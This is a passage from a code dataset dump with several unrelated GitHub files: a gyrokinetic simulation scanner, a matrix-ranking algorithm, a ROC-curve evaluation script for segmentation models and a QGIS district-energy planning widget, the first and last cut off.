\\\"{self.inputs['files']['input_path']}\\\")\n\trun.namelist_diffs = nd\n\trun.save_out(filename = \\\"{filename}\\\", directory = \\\"{directory}\\\",SlurmSave = True,QuickSave = {QuickSave})\"\"\")\n\t\t\tpyth.close()\n\t\t\tos.system(f\"sbatch \\\"{self.inputs['data_path']}/submit_files/save_out.job\\\"\")\n\t\t\treturn\n\t\t\t\n\t\tif not self.check_setup():\n\t\t\treturn\n\t\t\t\n\t\t\n\t\tpsi_itt = self.single_parameters['psin'].values if 'psin' in self.single_parameters else self.dimensions['psin'].values\n\t\tequilibrium = {}\n\t\tfor psiN in psi_itt:\n\t\t\tequilibrium[psiN] = {}\n\t\t\tnml = self.eqbm.get_surface_input(psiN)\n\t\t\tequilibrium[psiN]['shear'] = nml['theta_grid_eik_knobs']['s_hat_input']\n\t\t\tequilibrium[psiN]['beta_prime'] = nml['theta_grid_eik_knobs']['beta_prime_input']\n\t\t\n\t\tif self['gyro']:\n\t\t\tgyro_data = {}\n\t\t\tgroup_data = {}\n\t\t\tonly = set({'omega','kx','ky'})\n\t\t\tif not QuickSave:\n\t\t\t\tonly = only | set({'phi','bpar','apar','phi2','t','theta', 'gds2', 'jacob','ql_metric_by_mode', 'phi2_by_mode'})\n\t\t\t#if self.inputs['epar']:\n\t\t\t\t#only = only | set({'epar'}) NOT CURRENTLY WORKING\n\t\t\tdata_keys = ['growth_rate','mode_frequency','omega','phi','bpar','apar','epar','phi2','parity','ql_metric']\n\t\t\tgroup_keys = ['phi2_avg','t','theta', 'gds2', 'jacob']\n\t\t\tgyro_keys = {}\n\t\t\tfor dim in self.dimensions.values():\n\t\t\t\tgyro_keys[dim.name] = {}\n\t\t\t\tfor val in dim.values:\n\t\t\t\t\tgyro_keys[dim.name][val] = set()\n\t\t\tif self.inputs['grid_option'] == 'box':\n\t\t\t\tkxs = set()\n\t\t\t\tkys = set()\n\t\t\t\tgyro_keys['ky'] = {}\n\t\t\t\tgyro_keys['kx'] = {}\n\t\t\t\n\t\t\truns = self.get_all_runs()\n\t\t\tfor run in runs:\n\t\t\t\tsub_dir = self.get_run_directory(run)\n\t\t\t\ttry:\n\t\t\t\t\texisting_inputs = [] \n\t\t\t\t\tfor f in glob.glob(r'itteration_*.in'):\n\t\t \t\t\texisting_inputs.append([x for x in f if x.isdigit()])\n\t\t\t\t\titt = max([eval(\"\".join(x)) for x in existing_inputs],default=0)\n\t\t\t\t\trun_data = readnc(f\"{sub_dir}/itteration_{itt}.out.nc\",only=only)\t\n\t\t\t\t\tgroup_key = run_data['attributes']['id']\n\t\t\t\t\tgroup_data[group_key] = {}\n\t\t\t\t\tfor key in group_keys:\n\t\t\t\t\t\tgroup_data[group_key][key] = None\n\t\t\t\t\tfor xi, kx in enumerate(run_data['kx']):\n\t\t\t\t\t\tfor yi, ky in enumerate(run_data['ky']):\n\t\t\t\t\t\t\trun_key = str(uuid4())\n\t\t\t\t\t\t\tgyro_data[run_key] = deepcopy(run)\n\t\t\t\t\t\t\tfor key in run:\n\t\t\t\t\t\t\t\tgyro_keys[key][run[key]].add(run_key)\n\t\t\t\t\t\t\tgyro_data[run_key]['group_key'] = group_key\n\t\t\t\t\t\t\tif self.inputs['grid_option'] == 'box':\n\t\t\t\t\t\t\t\tkxs.add(kx)\n\t\t\t\t\t\t\t\tkys.add(ky)\n\t\t\t\t\t\t\t\tif ky not in gyro_keys['ky']:\n\t\t\t\t\t\t\t\t\tgyro_keys['ky'][ky] = set()\n\t\t\t\t\t\t\t\tif kx not in gyro_keys['kx']:\n\t\t\t\t\t\t\t\t\tgyro_keys['kx'][kx] = set()\n\t\t\t\t\t\t\t\tgyro_keys['ky'][ky].add(run_key)\n\t\t\t\t\t\t\t\tgyro_keys['kx'][kx].add(run_key)\n\t\t\t\t\t\t\tif 'kx' not in gyro_data[run_key]:\n\t\t\t\t\t\t\t\tgyro_data[run_key]['kx'] = kx\n\t\t\t\t\t\t\tif 'ky' not in gyro_data[run_key]:\n\t\t\t\t\t\t\t\tgyro_data[run_key]['ky'] = ky\n\t\t\t\t\t\t\t#gyro_data['nml_diffs'] = self.namelist_diffs[?]\n\t\t\t\t\t\t\tfor key in data_keys:\n\t\t\t\t\t\t\t\tgyro_data[run_key][key] = None\n\t\t\t\t\t\t\tfor key in only:\n\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\tkey_data = run_data[key]\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tif key == 'omega':\n\t\t\t\t\t\t\t\t\t\tom = key_data[-1,yi,xi]\n\t\t\t\t\t\t\t\t\t\tif type(om) != complex:\n\t\t\t\t\t\t\t\t\t\t\tom = key_data[-2,yi,xi]\n\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['growth_rate'] = imag(om)\n\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['mode_frequency'] = real(om)\n\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['omega'] = key_data[:,yi,xi].tolist()\n\t\t\t\t\t\t\t\t\telif key in ['phi','apar','bpar']:\n\t\t\t\t\t\t\t\t\t\tgyro_data[run_key][key] = key_data[yi,xi,:].tolist()\n\t\t\t\t\t\t\t\t\t\tif key == 'phi':\n\t\t\t\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t\t\t\tsymsum = sum(abs(key_data[yi,xi,:] + key_data[yi,xi,::-1]))/sum(abs(key_data[yi,xi,:]))\n\t\t\t\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\t\t\t\tsymsum = 1\n\t\t\t\t\t\t\t\t\t\t\tif symsum > 1.5:\n\t\t\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['parity'] = 1\n\t\t\t\t\t\t\t\t\t\t\telif symsum < 0.5:\n\t\t\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['parity'] = -1\n\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['parity'] = 0\n\t\t\t\t\t\t\t\t\telif key in ['t','theta', 'gds2', 'jacob']:\n\t\t\t\t\t\t\t\t\t\tgroup_data[group_key][key] = key_data.tolist()\n\t\t\t\t\t\t\t\t\telif key in ['phi2']:\n\t\t\t\t\t\t\t\t\t\tgroup_data[group_key]['phi2_avg'] = key_data.tolist()\n\t\t\t\t\t\t\t\t\telif key in ['ql_metric_by_mode']:\n\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['ql_metric'] = key_data[-1,yi,xi]\n\t\t\t\t\t\t\t\t\telif key in ['phi2_by_mode']:\n\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['phi2'] = key_data[:,yi,xi]\n\t\t\t\t\t\t\t\t\telif key in ['epar']:\n\t\t\t\t\t\t\t\t\t\tepar_path = f\"{sub_dir}/itteration_{itt}.epar\"\n\t\t\t\t\t\t\t\t\t\tepar_data = loadtxt(epar_path)\n\t\t\t\t\t\t\t\t\t\tepar = []\n\t\t\t\t\t\t\t\t\t\tfor l in range(len(epar_data[:,3])):\n\t\t\t\t\t\t\t\t\t\t\tepar.append(complex(epar_data[l,3],epar_data[l,4]))\n\t\t\t\t\t\t\t\t\t\tepar = array(epar)\n\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['epar'] = epar\n\t\t\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\t\t\tprint(f\"Save Error in {sub_dir}/itteration_{itt}: {e}\")\n\t\t\t\t\t\t\t\t\tif key == 'omega':\n\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['growth_rate'] = nan\n\t\t\t\t\t\t\t\t\t\tgyro_data[run_key]['mode_frequency'] = nan\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(f\"Save Error {sub_dir}/itteration_{itt}: {e}\")\n\t\t\tif self.inputs['grid_option'] == 'box':\n\t\t\t\texisting_dim_keys = []\n\t\t\t\tfor key in [x for x in self.inputs.inputs.keys() if 'dimension_' in x]:\n\t \t\t\texisting_dim_keys.append([x for x in key if x.isdigit()])\n\t\t\t\tdim_n = max([eval(\"\".join(x)) for x in existing_dim_keys],default=1) + 1\n\t\t\t\tkxs = list(kxs)\n\t\t\t\tkxs.sort()\n\t\t\t\tself.inputs.inputs[f'dimension_{dim_n}'] = {'type': 'kx', 'values': kxs, 'min': min(kxs), 'max': max(kxs), 'num': len(kxs), 'option': None}\n\t\t\t\tkys = list(kys)\n\t\t\t\tkys.sort()\n\t\t\t\tself.inputs.inputs[f'dimension_{dim_n+1}'] = {'type': 'ky', 'values': kys, 'min': min(kys), 'max': max(kys), 'num': len(kys), 'option': None}\n\t\t\t\tself.inputs.load_dimensions()\n\t\telse:\n\t\t\tgyro_data = None\n\t\t\tgyro_keys = None\n\n\t\tif self['ideal']:\n\t\t\tideal_keys = {}\n\t\t\tif 'theta0' in self.single_parameters:\n\t\t\t\ttheta0_itt = self.single_parameters['theta0'].values \n\t\t\tif 'theta0' in self.dimensions:\n\t\t\t\ttheta0_itt = self.dimensions['theta0'].values\n\t\t\telse:\n\t\t\t\ttheta0_itt = [0]\n\t\t\t\n\t\t\tideal_keys['psin'] = {}\n\t\t\tideal_keys['theta0'] = {}\n\t\t\tfor val in psi_itt:\n\t\t\t\tideal_keys['psin'][val] = set()\n\t\t\tfor val in theta0_itt:\n\t\t\t\tideal_keys['theta0'][val] = set()\n\n\t\t\tideal_data = {}\n\t\t\tfor run in self.get_all_ideal_runs():\n\t\t\t\trun_id = str(uuid4())\n\t\t\t\tfor key in run:\n\t\t\t\t\tideal_keys[key][run[key]].add(run_id)\n\t\t\t\tideal_data[run_id] = {}\n\t\t\t\ttry:\n\t\t\t\t\tsub_dir = self.get_ideal_run_directory(run)\n\t\t\t\t\texisting_inputs = [] \n\t\t\t\t\tfor f in glob.glob(r'itteration_*.in'):\n\t\t\t\t\t\texisting_inputs.append([x for x in f if x.isdigit()])\n\t\t\t\t\titt = max([eval(\"\".join(x)) for x in existing_inputs],default=0)\n\n\t\t\t\t\tshear = loadtxt(f\"{sub_dir}/itteration_{itt}.ballstab_shat\")\n\t\t\t\t\tbp = loadtxt(f\"{sub_dir}/itteration_{itt}.ballstab_bp\")\n\t\t\t\t\tstab = loadtxt(f\"{sub_dir}/itteration_{itt}.ballstab_2d\")\n\t\t\t\t\t\n\t\t\t\t\tideal_data[run_id]['beta_prime'] = [abs(x) for x in bp]\n\t\t\t\t\tideal_data[run_id]['shear'] = shear.tolist()\n\t\t\t\t\tideal_data[run_id]['stabilities'] = transpose(stab).tolist()\n\t\t\t\texcept:\n\t\t\t\t\tideal_data[run_id]['beta_prime'] = None\n\t\t\t\t\tideal_data[run_id]['shear'] = None\n\t\t\t\t\tideal_data[run_id]['stabilities'] = None\n\t\t\t\t\tprint(f\"Save Error for ideal run: {run}\")\n\t\telse:\n\t\t\tideal_data = None\n\t\t\tideal_keys = None\n\t\t\n\t\tdata = {'gyro': gyro_data,\n\t\t\t'ideal': ideal_data,\n\t\t\t'group': group_data,\n\t\t\t'equilibrium': equilibrium,\n\t\t\t'_gyro_keys': gyro_keys,\n\t\t\t'_ideal_keys': ideal_keys,\n\t\t\t}\n\t\t\n\t\tself.file_lines = {'eq_file': self.eqbm._eq_lines, 'kin_file': self.eqbm._kin_lines, 'template_file': self.eqbm._template_lines}\n\t\tsavez(f\"{directory}/{filename}\", inputs = self.inputs.inputs, data = data, files = self.file_lines)\n\t\n\t'''\n\tdef rerun(self, runs = None, nml = None, directory = None, group_runs = None):\n\t\tif runs is None:\n\t\t\tprint(\"ERROR: runs not given\")\n\t\t\treturn\n\t\tif nml is None:\n\t\t\tprint(\"ERROR: nml not given, if you wish to rerun with no changes please use nml = {}\")\n\t\t\treturn\n\t\t\t\n\t\tself.check_setup()\n\t\t\n\t\tif type(nml) == str:\n\t\t\tnml = f90nml.read(nml)\n\t\tfor p,i,j,k,t in runs:\n\t\t\tself.namelist_diffs[p][i][j][k][t] = nml\n\t\tself.inputs.inputs['itteration'] += 1\n\t\tself.make_gyro_files(specificRuns = runs, directory = directory, group_runs = group_runs)\n\t\tself.run_jobs()\n\t\t\n\tdef load_run_set(self, filename = None):\n\t\tif filename is None:\n\t\t\tprint(\"ERROR: filename not given\")\n\t\t\treturn\n\t\t\n\t\truns = set()\t\t\n\t\twith open(filename) as f:\n\t\t\tlines = f.readlines()\n\t\t\tfor line in lines:\n\t\t\t\tp,i,j,k,t = [eval(x) for x in line.strip(\"\\n\").split(\"_\")]\n\t\t\t\truns.add((p,i,j,k,t))\n\t\treturn runs\n\t'''\n","repo_name":"Charlie-Nicholls/Myrokinetics","sub_path":"scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":31196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74860225126","text":"import sys\nimport heapq\n'''\n4 3\n20 -21 14\n-19 4 19\n22 -47 24\n-19 4 19\n'''\nM, N = map(int, sys.stdin.readline().rstrip().split(\" \"))\nmatrix = [[0] * N for _ in range(M)]\nresult = [[1] * N for _ in range(M)]\nheap = []\n\nfor i in range(M):\n tmp = list(sys.stdin.readline().rstrip().split(\" \"))\n for j in range(N):\n matrix[i][j] = (int)(tmp[j])\n heapq.heappush(heap, (matrix[i][j], (i, j)))\n\nwhile heap:\n value, (i, j) = heapq.heappop(heap)\n\n for k in range(M):\n if k != i:\n if value < matrix[k][j]:\n result[k][j] = max(result[i][j] + 1, result[k][j])\n else:\n continue\n\n for k in range(N):\n if k != j:\n if value < matrix[i][k]:\n result[i][k] = max(result[i][j] + 1, result[i][k])\n else:\n continue\n\nfor i in range(M):\n for j in range(N):\n print(result[i][j], end=\" \")\n print()\n\n\n\n","repo_name":"gooriiie/PythonAlgorithm","sub_path":"ChangeMatrix.py","file_name":"ChangeMatrix.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71516561127","text":"# import the necessary packages\nfrom training import config\nimport numpy as np\nimport torch\nfrom training.dataset import MultiTaskDataset\nimport torchmetrics.functional as f\nimport pandas as pd\nfrom torch.utils.data import DataLoader\nimport cv2\nimport argparse\nfrom sklearn.metrics import roc_curve, roc_auc_score, confusion_matrix\nimport matplotlib.pyplot as plt\nimport os\n\ncolor = {'BCE15-006': 'aqua',\n\t\t'BCE': 'forestgreen',\n\t\t'dice': 'darkslateblue',\n\t\t'BCE15-6': 'deepskyblue',\n\t\t'BCE15': 'lawngreen',\n\t\t'Dice15-6': 'purple',\n\t\t'Dice15-006': 'orchid',\n\t\t'dice15': 'crimson',\n\t\t}\n\ndef plot_roc_curve(fpr, tpr, dir,auroc):\n\tplt.plot(fpr, tpr, color = color[dir], label=dir + ': ' + f'{auroc:.3f}')\n #plt.show()\n\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-l\", \"--letter\", type=str, required=True, help=\"letter of the fold in capital case\")\nap.add_argument(\"-p\", \"--path\", type=str, required=False, help=\"path to output trained model\", default=\"Rocs\")\nargs = vars(ap.parse_args())\n\n# load the image and mask filepaths in a sorted manner\nLETTER = args[\"letter\"]\nOUTPUT = args[\"path\"]\n\n\nroot_dir = config.IMAGE_DATASET_PATH\ncsv_file = config.test_dataset_path(LETTER)\n\ndef each_model(path, dir):\n\tprint(\"[INFO] load up model \" + dir +\"...\")\n\tunet = torch.load(MODEL_PATH).to(config.DEVICE)\n\ty_intensity_ = []\n\tpreds_intensity_ = []\n\tunet.eval()\n\t# turn off gradient tracking\n\twith torch.no_grad():\n\t\tfor (x, y0, y1, y2) in testLoader:\n\t\t\t# send the input to the device\n\t\t\tx = x.to(config.DEVICE)\n\t\t\tpreds = unet(x)\n\t\t\ty_intensity_ += [y2.cpu().item(), ]\n\t\t\tpreds_intensity_ += [torch.sigmoid(preds[2].squeeze()).cpu().item(), ]\n\n\ty_intensity = np.array(y_intensity_)\n\tpreds_intensity = np.array(preds_intensity_)\n\n\tfpr, tpr, thresholds = roc_curve(y_intensity, preds_intensity)\n\tauroc = roc_auc_score(y_intensity, preds_intensity)\n\tprint('AUROC: ', auroc)\n\toptimal_idx = np.argmax(tpr - fpr)\n\toptimal_threshold = thresholds[optimal_idx]\n\tprint(\"Threshold optimal value is:\", optimal_threshold)\n\tplot_roc_curve(fpr, tpr, dir, auroc=auroc)\n\n\tpreds_intensity_old = torch.where(torch.Tensor(preds_intensity.squeeze()).to(config.DEVICE) > torch.Tensor([config.THRESHOLD]).to(config.DEVICE), 1, 0).squeeze().cpu()\n\tprint('Intensity accuracy old',len(np.array(torch.where((torch.Tensor(preds_intensity_old) == torch.Tensor(y_intensity)))[0])) / len(testLoader))\n\t#print(confusion_matrix(preds_intensity_old, y_intensity))\n\t\n\tpreds_intensity_new = torch.where(torch.Tensor(preds_intensity.squeeze()).to(config.DEVICE) > torch.Tensor([optimal_threshold]).to(config.DEVICE), 1, 0).squeeze().cpu()\n\tprint('Intensity accuracy new', len(np.array(torch.where((torch.Tensor(preds_intensity_new) == torch.Tensor(y_intensity)))[0])) / len(testLoader))\n\t#print(confusion_matrix(preds_intensity_new, y_intensity))\n\n\nif __name__ == '__main__':\n\tprint(\"[INFO] loading up test image paths...\")\n\ttestData = MultiTaskDataset(csv_file=csv_file, root_dir=root_dir)\n\ttestLoader = DataLoader(testData, shuffle=False, batch_size=1, pin_memory=config.PIN_MEMORY, num_workers=2)\n\tfig = plt.figure(1)\n\tplt.plot([0, 1], [0, 1], color='darkblue', linestyle=(0, (1, 10)))\n\tfor dir in next(os.walk(config.BASE_OUTPUT))[1]:\n\t\tif not (dir == 'tmp' or dir == 'Confusions' or dir == 'Confusions Absolute' or dir == 'Rocs'):\n\t\t\tMODEL_PATH = os.path.join(config.BASE_OUTPUT, dir) + '/model' + LETTER\n\t\t\teach_model(MODEL_PATH, dir)\n\t\t\tprint('model ' + dir + ' success')\n\n\tplt.legend()\n\tplt.xlabel('False Positive Rate')\n\tplt.ylabel('True Positive Rate')\n\tplt.title('Receiver Operating Characteristic (ROC) Curve')\n\n\tfig.savefig(os.path.join(config.BASE_OUTPUT, OUTPUT) + '/roc'+LETTER+'.pdf')\n\n\n\n\n\n","repo_name":"gargiuloanna/Medical-Imaging","sub_path":"MultiTask/roc.py","file_name":"roc.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17970826083","text":"import os\n\nfrom PyQt5 import QtWidgets, uic\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5 import QtCore\nfrom PyQt5.QtGui import QColor, QPixmap, QIcon, QBrush\nimport os.path\nimport logging\nimport sys\nimport traceback\nimport time\n\n# Import PyQt5\nfrom PyQt5.QtWidgets import QTableWidgetItem, QMessageBox\n\n\n# Import qgis main libraries\nfrom qgis.core import *\nfrom qgis.gui import *\nfrom qgis.utils import *\n\n# Import the custom tree widget items\nfrom .utility.filters.FECvisualizerService import FECvisualizerService\n\nfrom .building.DPM import *\nfrom .dialogSources import CheckSourceDialog\nfrom .technology.Technology import *\n\nfrom .Tjulia.Solar_thermal_production import generate_solar_thermal_forJulia\nfrom .Tjulia.single_building.Dem_cool_heating import generafile\nfrom .Tjulia.gui.SimulationDetailsWorker import SimulationDetailsWorker\nfrom .Tjulia.DistrictSimulator import DistrictSimulator\nfrom .Tjulia.test.MyLog import MyLog\n\nfrom .utility.pvgis.PvgisApiWorker import PvgisApiWorker\nfrom .utility.exceptions.UserInterruptException import UserInterruptException\n\nfrom . import master_planning_config\n\nimport requests\n\nFORM_CLASS, _ = uic.loadUiType(os.path.join(\n os.path.dirname(__file__), 'ui', 'Step2dockwidget.ui'))\n\n\nclass Step2_widget(QtWidgets.QDockWidget, FORM_CLASS):\n step2_closing_signal = pyqtSignal()\n send_KPIs_to_future = pyqtSignal(dict)\n update_progress_bar = pyqtSignal(int)\n stop_progress_bar = pyqtSignal()\n\n def attivati(self):\n print(\"ciao\")\n\n def __init__(self, work_folder=None, parent=None, iface=None):\n \"\"\"Constructor.\"\"\"\n super(Step2_widget, self).__init__(parent)\n\n self.logger = logging.getLogger(__name__)\n self.my_log = MyLog(os.path.join(os.path.dirname(os.path.realpath(__file__)), \"Tjulia\", \"test\", \"log\",\n \"log_simulator.txt\"))\n # Set up the user interface from Designer.\n # After setupUI you can access any designer object by doing\n # self., and you can use autoconnect slots - see\n # http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html\n # #widgets-and-dialogs-with-auto-connect\n self.setupUi(self)\n self.iface = iface\n self.loading_mode_on = False\n self.baseline_buildings_widget = None\n self.baseline_sources_table = None\n self.baseline_scenario = None\n self.DHN_network_list = []\n self.DCN_network_list = []\n self.step0 = None\n self.step1 = None\n self.KPIs = None\n self.work_folder = work_folder\n self.simulator = None\n\n self.sources = CheckSourceDialog()\n\n for table in [self.tableWidget_5, self.tableWidget_2, self.tableWidget_3, self.tableWidget_4]:\n for i in range(table.rowCount()):\n for j in range(table.columnCount()):\n widget_item = table.item(i, j)\n if widget_item is not None:\n widget_item.setFlags(Qt.ItemIsEnabled)\n if j == 0:\n widget_item.setBackground(QBrush(QColor(Qt.white)))\n\n\n self.progressBar.hide()\n # self.tableWidget_5.setSpan(1, 0, 2, 1)\n # self.tableWidget_5.setSpan(3, 0, 2, 1)\n # self.tableWidget_5.setSpan(5, 0, 2, 1)\n # self.tableWidget_5.setSpan(7, 0, 2, 1)\n # self.tableWidget_5.setSpan(9, 0, 2, 1)\n # self.tableWidget_5.setSpan(11, 0, 2, 1)\n # self.tableWidget_5.setSpan(13, 0, 2, 1)\n # self.tableWidget_5.setSpan(16, 0, 2, 1)\n # self.tableWidget_2.setSpan(1, 0, 2, 1)\n # self.tableWidget_2.setSpan(3, 0, 6, 1)\n self.heat = None\n self.temperature = None\n\n icon = QIcon()\n icon_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"icons\",\n \"edit.png\")\n icon.addPixmap(QPixmap(icon_path), QIcon.Normal, QIcon.Off)\n self.calculateKpi.setIcon(icon)\n\n self.calculateKpi.clicked.connect(self.show_progress_bar)\n\n self.fec_visualizer_service = FECvisualizerService(self.output_table, self.fec_filter_combo_box,\n self.description_filter_label, mode=\"baseline\")\n\n self.mode_individual_buildings_active = False\n self.mode_networks_active = False\n\n self.tableWidget_5.hideRow(3)\n self.tableWidget_5.hideRow(4)\n self.tableWidget_5.hideRow(23)\n self.tableWidget_2.hideRow(9)\n for i in range(self.tableWidget_3.rowCount()):\n if i not in [0, 5]:\n self.tableWidget_3.hideRow(i)\n\n self.tabWidget.setCurrentIndex(0)\n self.pop_up_progress_bar = None\n\n def closeEvent(self, event):\n self.closeStep2()\n event.accept()\n\n def closeStep2(self):\n if not self.loading_mode_on:\n if self.KPIs is None:\n msg = QMessageBox(self)\n msg.setIcon(QMessageBox.Question)\n msg.setStandardButtons(QMessageBox.Yes|QMessageBox.No)\n msg.setWindowTitle(\"KPIs uncomputed\")\n msg.setText(\"The KPIs have not been calculated. They need to be computed to run the simulation.\"\n + \" Do you want to continue anyway ?\")\n retval = msg.exec_()\n if retval == QMessageBox.No:\n return\n self.hide()\n self.step2_closing_signal.emit()\n\n def show_progress_bar(self):\n\n max_progress = 0\n max_progress = max_progress + (\n len(self.DHN_network_list) + len(self.DCN_network_list)) * 4\n try:\n for _ in self.baseline_scenario.getFeatures():\n max_progress = max_progress + 1\n except:\n pass\n #self.progressBar.setMaximum(max_progress)\n #self.progressBar.setMinimum(0)\n #self.progressBar.setValue(0)\n #self.progressBar.show()\n #self.label_3.setText(\"Starting computation...\")\n\n def update_mode_networks(self, isactive):\n self.mode_networks_active = isactive\n\n def update_mode_single_buildings(self, isactive):\n self.mode_individual_buildings_active = isactive\n\n def KPIs_baselineScenario(self):\n self.my_log.log(\"GENERAL COMPUTATION STARTS\")\n kpis_folder = os.path.join(master_planning_config.CURRENT_PLANNING_DIRECTORY,\n master_planning_config.DISTRICT_FOLDER,\n master_planning_config.KPIS_FOLDER)\n\n #======================= Network approach =========================\n if True:#self.mode_networks_active:\n self.my_log.log(\"NETWORKS GENERAL COMPUTATION STARTS\")\n #dr = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"Tjulia\", \"district\", \"heating\")\n dr = os.path.join(kpis_folder, \"Tjulia\", \"district\", \"heating\")\n self.remove_files(os.path.join(dr, \"Results\"), \"Result\")\n #dr_sim = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"Tjulia\", \"district\")\n dr_sim = os.path.join(kpis_folder, \"Tjulia\", \"district\")\n\n print(\"Step2.py, KPIs_baselineScenario(): setting up simulator\")\n self.set_up_simulator()\n print(\"Step2.py, KPIs_baselineScenario(): running district simulator\")\n # thread_networks = QThread()\n # self.simulator.main_thread = QtCore.QThread.currentThread()\n # self.simulator.moveToThread(thread_networks)\n # self.simulator.finished.connect(thread_networks.quit)\n # thread_networks.finished.connect(thread_networks.deleteLater)\n # thread_networks.started.connect(lambda: self.simulator.run_district(dr_sim))\n # thread_networks.start()\n self.simulator.run_district(dr_sim)\n self.my_log.log(\"NETWORKS GENERAL COMPUTATION ENDS\")\n\n #======================= Buildings approach =========================\n\n if True:#self.mode_individual_buildings_active:\n self.my_log.log(\"BUILDINGS GENERAL COMPUTATION STARTS\")\n now = time.time()\n #dr = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"Tjulia\", \"single_building\")\n dr = os.path.join(kpis_folder, \"Tjulia\", \"single_building\")\n # ==> [PlanHeatProjectName]_hourly.csv\n # DEM_cool_time.csv\n # DEM_time.csv\n # DEM_DHW_time.csv\n print(\"Step2.py, KPIs_baselineScenario(): generating hourly profiles\")\n cinput = os.path.join( master_planning_config.CURRENT_MAPPING_DIRECTORY,\n master_planning_config.DMM_FOLDER,\n master_planning_config.DMM_PREFIX+master_planning_config.DMM_HOURLY_SUFFIX+\".csv\")\n n, buildings = generafile(self.step1.dmmTree, cinput=cinput, coutput=os.path.join(dr, \"input\"))\n self.my_log.log(\"Hourly profiles processed in \" + str(time.time()-now) + \" seconds.\")\n now = time.time()\n self.remove_files(os.path.join(dr, \"Results\"), \"Result\")\n self.my_log.log(\"Old results removed in \" + str(time.time() - now) + \" seconds.\")\n now = time.time()\n self.my_log.log(\"Common precaltulations done in \" + str(time.time() - now) + \" seconds.\")\n print(\"Step2.py, KPIs_baselineScenario(): running building calculation*\")\n self.simulator.run_buildings(buildings, dr, log=self.my_log)\n self.simulator.progress_bar = self.progressBar\n self.my_log.log(\"BUILDINGS GENERAL COMPUTATION ENDS\")\n\n\n #================================================================\n KPIs = self.simulator.close_simulation()\n self.fec_visualizer_service.set_KPIs(KPIs)\n\n self.KPIs = KPIs\n\n self.send_KPIs_to_future.emit(self.KPIs)\n\n cellr =QTableWidgetItem(str(KPIs[\"EN_1.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_1.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_1.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(1, 3, cellr)\n self.tableWidget_5.setItem(1, 4, cellt)\n self.tableWidget_5.setItem(1, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_1.2R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_1.2T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_1.2\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(2, 3, cellr)\n self.tableWidget_5.setItem(2, 4, cellt)\n self.tableWidget_5.setItem(2, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_2.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_2.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_2.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(3, 3, cellr)\n self.tableWidget_5.setItem(3, 4, cellt)\n self.tableWidget_5.setItem(3, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_2.2R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_2.2T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_2.2\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(4, 3, cellr)\n self.tableWidget_5.setItem(4, 4, cellt)\n self.tableWidget_5.setItem(4, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_3.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_3.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_3.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(5, 3, cellr)\n self.tableWidget_5.setItem(5, 4, cellt)\n self.tableWidget_5.setItem(5, 5, cell)\n\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_3.2R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_3.2T\"]))\n cell = 